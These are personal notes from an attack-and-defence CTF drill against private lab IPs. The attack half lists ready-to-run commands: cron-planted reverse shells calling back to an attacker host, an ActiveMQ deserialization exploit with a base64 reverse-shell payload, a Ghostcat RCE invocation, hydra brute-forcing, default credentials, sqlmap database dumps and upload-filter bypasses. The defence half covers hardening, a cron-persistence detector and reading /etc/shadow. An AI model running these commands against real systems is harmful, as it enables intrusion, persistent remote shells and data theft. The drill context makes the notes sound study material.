Spent the last two days on a hands-on attack-and-defence drill.
The result was decent; I won a Xiaomi speaker. Keep at it.
I wrote down some scripts for quick attack and defence.
attack
Check-in
http://192.168.20.158/robots.txt
http://192.168.40.196/robots.txt
Weak passwords
```bash
ssh chenyf@192.168.20.253
ssh chenyf@192.168.40.200
echo '*/1 * * * * root echo "bash -i >& /dev/tcp/192.168.30.123/110 0>&1" | bash -i' >> /etc/crontab
echo '*/1 * * * * root echo "bash -i >& /dev/tcp/192.168.30.123/120 0>&1" | bash -i' >> /etc/crontab
mysql -h 192.168.20.158 -u root -proot
mysql -h 192.168.40.196 -u root -proot
rdesktop -f -a 16 192.168.20.158:3389
rdesktop -f -a 16 192.168.40.196:3389
ftp 192.168.20.158 anonymous
ftp 192.168.40.196 anonymous
```
Site admin backend
http://192.168.20.158/?/admin/
http://192.168.40.196/?/admin/
Scan the site for flags
dirb http://192.168.20.158/ dict/dirb_zidian.txt
dirb http://192.168.40.196/ dict/dirb_zidian.txt
Brute-force weak passwords
```bash
hydra -L dict/user.txt -P dict/pass.txt -vV -e ns 192.168.20.158 ssh -f
hydra -L dict/user.txt -P dict/pass.txt -vV -e ns 192.168.40.196 ssh -f
hydra 192.168.20.158 rdp -L dict/user.txt -P dict/pass.txt -V -f
hydra 192.168.40.196 rdp -L dict/user.txt -P dict/pass.txt -V -f
```
Middleware vulnerabilities
- ActiveMQ
Race to access it early:
http://192.168.20.253:8161/admin/browse.jsp?JMSDestination=event
http://192.168.40.200:8161/admin/browse.jsp?JMSDestination=event
```bash
bash –i >& /dev/tcp/192.168.30.123/4444 0>&1 YmFzaCATaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyMy80NDQ0IDA+JjE=
java -jar jmet/jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCATaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyMy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.20.253 61616
java -jar jmet/jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCATaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMwLjEyMy80NDQ0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 192.168.40.200 61616
nc -lvp 4444
```
- Ajp
```bash
python3 2020-10487.py -p 8009 -f /WEB-INF/shell.jsp 192.168.20.253 --rce 1
python3 2020-10487.py -p 8009 -f /WEB-INF/shell.jsp 192.168.40.200 --rce 1
```
- Weblogic weak password
http://192.168.20.253:7001/console
http://192.168.40.200:7001/console
weblogic
Oracle@123
sql
Capture the request with Burp
```bash
sqlmap -r sql.txt --dbs
sqlmap -r sql.txt -D security --tables
sqlmap -r sql.txt -D security -T users --dump
```
upload
```text
.PHP .php3 .phtml .php. . php .pphphp
content/type:image/png
GIF89a
```
defence
Change passwords
```bash
sudo passwd chenyf
sudo passwd root
```
http://192.168.30.200/?/admin/
Delete users
```bash
cat /etc/passwd   # check the last line
deluser [user]
```
Control Panel - User Accounts - Remove user accounts
Kick out intruders
```bash
w
ps -ef | grep ssh   # find the process [pid]
kill -9 [pid]
```
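Added example (not part of the original notes): the attack section above plants reverse-shell entries in /etc/crontab, and kicking the session is not enough if the cron job keeps calling back every minute. This Python check reads system crontab files and flags lines that look like that persistence; the indicator patterns and the sample crontab are constructed assumptions.

```python
import re
from pathlib import Path

# Assumed indicators for the cron-based reverse shell used in the drill notes.
SUSPICIOUS = [
    re.compile(r"/dev/tcp/"),
    re.compile(r"\bbash\s+-i\b"),
    re.compile(r"\bnc\b.*\s-e\s"),
    re.compile(r"base64\s+(-d|--decode)"),
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),
]


def find_suspicious_cron(text: str):
    """Return (line_number, line) for each non-comment cron line matching an indicator."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if any(p.search(stripped) for p in SUSPICIOUS):
            hits.append((n, stripped))
    return hits


def audit_cron_files(paths=("/etc/crontab",), cron_dirs=("/etc/cron.d",)):
    """Scan system crontab files read-only and return {path: hits}; nothing is modified."""
    results = {}
    candidates = [Path(p) for p in paths]
    for d in cron_dirs:
        dp = Path(d)
        if dp.is_dir():
            candidates.extend(sorted(f for f in dp.iterdir() if f.is_file()))
    for f in candidates:
        try:
            hits = find_suspicious_cron(f.read_text(errors="replace"))
        except OSError:
            continue  # unreadable or missing file: skip, do not crash the audit
        if hits:
            results[str(f)] = hits
    return results


# Constructed sample crontab with the same shape as the drill entry (placeholder IP).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
# 25 6  * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
*/1 * * * * root echo "bash -i >& /dev/tcp/ATTACKER_IP/110 0>&1" | bash -i
"""

if __name__ == "__main__":
    for n, line in find_suspicious_cron(SAMPLE_CRONTAB):
        print(f"sample line {n}: {line}")
    for path, hits in audit_cron_files().items():
        for n, line in hits:
            print(f"{path}:{n}: {line}")
```

Flagged lines are the ones to delete from the crontab (and from /var/spool/cron for the user if the attacker used a user crontab) before the kill, otherwise the shell reconnects on the next minute.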
Middleware vulnerabilities
First run docker ps and note the container ID
- ActiveMQ
```bash
wget -O /tmp/jetty-realm.properties http://192.168.30.123/jetty-realm.properties
docker cp /tmp/jetty-realm.properties [docker_id]:/opt/apache-activemq-5.11.1/conf/jetty-realm.properties
docker restart [docker_id]
```
- Ajp
```bash
wget -O /tmp/server.xml http://192.168.30.123/server.xml
docker cp /tmp/server.xml [docker_id]:/usr/local/tomcat/conf/server.xml
docker restart [docker_id]
```
- Weblogic weak password
Change the password, and be quick about it
http://192.168.30.100:7001/console
weblogic
Oracle@123
Web vulnerability: edit httpd.conf
Add:
```apache
<Files ~ "flag.txt">
    Order allow,deny
    Deny from all
</Files>
```
Disable anonymous FTP access
```bash
vim /etc/vsftpd/vsftpd.conf   # edit the config file; find this line in vsftpd.conf:
anonymous_enable=yes          # change to no (yes = allow, no = deny); save and exit
service vsftpd restart        # restart the FTP service (the service is named vsftpd)
```
Search local logs for flags
```bash
cat [log] | grep flag
```
log:
```text
/var/log/messages
/var/log/dmesg
/var/log/auth.log
/var/log/boot.log
/var/log/daemon.log
/var/log/dpkg.log
/var/log/kern.log
/var/log/lastlog
/var/log/maillog
/var/log/user.log
/var/log/Xorg.x.log
/var/log/alternatives.log
/var/log/btmp  => last -f /var/log/btmp | more
/var/log/wtmp
/var/log/utmp
/var/log/cups
/var/log/anaconda.log
/var/log/yum.log
/var/log/cron
/var/log/secure
/var/log/faillog
```
```bash
cat /etc/passwd
cat /etc/shadow
```
Also Apache's access.log and error.log.